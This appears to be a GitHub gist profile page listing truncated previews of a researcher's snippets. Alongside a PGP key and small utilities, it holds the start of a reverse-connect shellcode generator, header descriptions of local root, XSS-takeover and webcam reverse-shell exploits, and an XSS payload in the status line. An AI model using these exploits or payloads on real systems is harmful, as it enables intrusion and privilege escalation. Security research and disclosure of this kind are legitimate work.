Skip to content

Instantly share code, notes, and snippets.

View 0x27's full-sized avatar
💭
'"/><script>alert(0)</script>

David Davidson 0x27

💭
'"/><script>alert(0)</script>
670 followers · 33 following
View GitHub Profile
@0x27
0x27 / daviddavidson.pub
Created December 23, 2015 18:53
-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: GnuPG v2
mQINBFY2S58BEADnvXq/U9CTgwGEpy5QMj0QGa/qihCuRrOemz3jGYxhZTPJbp4O
W2qXbI6aeKfwQLVl/1b+beX6J437RkHNb7hm4eiCsxOIab7QVY6QtroLNKwvcDtH
dfYmS/1toSfHPdN3+ZzHVceJ9VIAm4Tsd9d22aXJoC8as6rL6RvproA+Io6WSa4n
0e2b0Nozj+ayfwshEb0viRw7PpSszyMmZtOuYmmmgKjWXwkgq15193C4TUShRtbb
HB6/No9H/U7waGbGHtWLUCHN7vzebjPCXqhI+3QW04TOoAUrdRw4PXz3Xnbk8p8h
V2jdQSYEBcLinR3U4LTP5pmHRiLxPuzzVbhSyiAbhjIn1fSk+JkXyQu0f2dawr+E
DYieqXQ/YVaxypVMPfWhpKhU/cZup4ssJb1WIiDv2gjV61MsUwuXtXgVDejMrqdT
@0x27
0x27 / hashit.py
Created December 30, 2015 22:14
#!/usr/bin/python2
# coding: utf-8
# Hash a file using a few algos.
# Written for a lab.
import hashlib
import sys
def hashfile(file, algo):
bs = 65536
buffer = file.read(bs)
@0x27
0x27 / elfgen-sctp.py
Created January 6, 2016 09:42
#!/usr/bin/python2
# coding: utf-8
# sctp backconnect elf generator v1.0
import socket
import struct
import sys
def make_shellcode(cb_host, cb_port):
sc = "7f454c4602010100000000000000000002003e00010000007800400000000000"
sc += "400000000000000000000000000000000000000040003800010000000000000"
@0x27
0x27 / unsanitary.sh
Last active April 30, 2021 03:36
#!/bin/bash
# unsanitary.sh - ASAN/SUID Local Root Exploit
# Exploits er, unsanitized env var passing in ASAN
# which leads to file clobbering as root when executing
# setuid root binaries compiled with ASAN.
# Uses an overwrite of /etc/ld.so.preload to get root on
# a vulnerable system. Supply your own target binary to
# use for exploitation.
# Implements the bug found here: http://seclists.org/oss-sec/2016/q1/363
# Video of Exploitation: https://www.youtube.com/watch?v=jhSIm3auQMk
@0x27
0x27 / VtScanTarPreview.md
Created March 21, 2016 01:46

Preview of vtscantar (which is going to be re-integrated into hfsdown). Only alerts on the files in the tar that are flagged by VirusTotal.

hack@theplanet:~/vtscantar$ python vtscantar.py ~/hfsdown/output/mirror-118.193.176.22.tar 
Scanning: /home/hack/hfsdown/output/mirror-118.193.176.22.tar
Infected File: DANDNA.apk -> SHA256sum: 72a0745d835d15a707580e3df36396fb2598d61314bb740772a36150d682ea12 -> VirusTotal: 22/55
Infected File: svchost.exe -> SHA256sum: 640525b3d664fe8ae8c861276c15dfec60f6f19db26669dcf28b13620cfced9d -> VirusTotal: 38/53
Infected File: ���22_sign.apk -> SHA256sum: 23f6e9b5e5ba85621d8b7403390825aa767ff6da28132e025844fba1e1ef47f2 -> VirusTotal: 21/54
Infected File: ���˽�_sign.apk -> SHA256sum: 37b02bbfec667862b4f6adcc0429d46e93e7a159244d6ffbf2af27d035d903f5 -> VirusTotal: 22/54
@0x27
0x27 / opera-vpn.md
Created January 19, 2017 15:49 — forked from spaze/opera-vpn.md
Opera VPN behind the curtains is just a proxy, here's how it works

When setting up (that's immediately when user enables it in settings) Opera VPN sends few API requests to https://api.surfeasy.com to obtain credentials and proxy IPs, see below, also see The Oprah Proxy.

The browser then talks to a proxy de0.opera-proxy.net (when VPN location is set to Germany), it's IP address can only be resolved from within Opera when VPN is on, it's 185.108.219.42 (or similar, see below). It's an HTTP/S proxy which requires auth.

When loading a page with Opera VPN enabled, the browser sends a lot of requests to de0.opera-proxy.net with Proxy-Authorization request header.

The Proxy-Authorization header decoded: CC68FE24C34B5B2414FB1DC116342EADA7D5C46B:9B9BE3FAE674A33D1820315F4CC94372926C8210B6AEC0B662EC7CAD611D86A3 (that's sha1(device_id):device_password, where device_id and device_password come from the POST /v2/register_device API call, please note that this decoded header is from another Opera installation and thus contains

@0x27
0x27 / freeacs-pwn.py
Created April 7, 2017 14:08
FreeACS Remote Takeover 0day (Persistent XSS via CWMP NOTIFY -> Add Admin User
#!/usr/bin/python
# worlds cheapest exploit - made by copypasting from stackoverflow.
# released at BSides Edinburgh.
# Exploits freeacs - freeacs.com
# TL;DR:
# - Persistent XSS via CWMP Notify message
# - XSS fires in admin session and adds a user
# HACK THE PLANET!
# Darren Martyn - @info_dox - 7th March 2017
from BaseHTTPServer import BaseHTTPRequestHandler,HTTPServer
@0x27
0x27 / upwned247.php
Created May 5, 2017 11:44 — forked from Wack0/upwned247.php
UCam247/Phylink/Titathink/YCam/Anbash/Trivision/Netvision/others IoT webcams : remote code exec: reverse shell PoC. (works only in qemu usermode)
<?php
/*
Updated version, 2016-12-02: fixed shellcode so it *actually* works on QEMU
usermode emulation (seems I pushed an old version), and removed debug output.
-------------------------
NB: THIS PoC ONLY WORKS IN QEMU USERMODE EMULATION!
If anyone wants to fix this, go ahead (no pun intended).
However, I don't have a vulnerable product and am unwilling to acquire one.
@0x27
0x27 / eurovision.py
Created May 13, 2017 20:54
#!/usr/bin/python2
# coding: utf-8
# implements: https://twitter.com/twisteddoodles/status/863474505808846848
# we import some random
import random
# first, we create our arrays, and pick random words from them and store.
a = random.choice(["cat", "horse", "seagull", "dolphin", "fire engine"])
b = random.choice(["escape", "make love to", "smother", "dance with"])
c = random.choice(["drumkit", "firework", "toilet", "seagull", "bag"])
d = random.choice(["disco", "airport", "changing room", "tumble dryer"])
@0x27
0x27 / x0rg.sh
Created October 25, 2018 21:05
#!/bin/bash
# x0rg - Xorg Local Root Exploit
# Released under the Snitches Get Stitches Public Licence.
# props to prdelka / fantastic for the shadow vector.
# Gr33tz to everyone in #lizardhq and elsewhere <3
# ~infodox (25/10/2018)
# FREE LAURI LOVE!
echo "x0rg"
echo "[+] First, we create our shell and library..."
cat << EOF > /tmp/libhax.c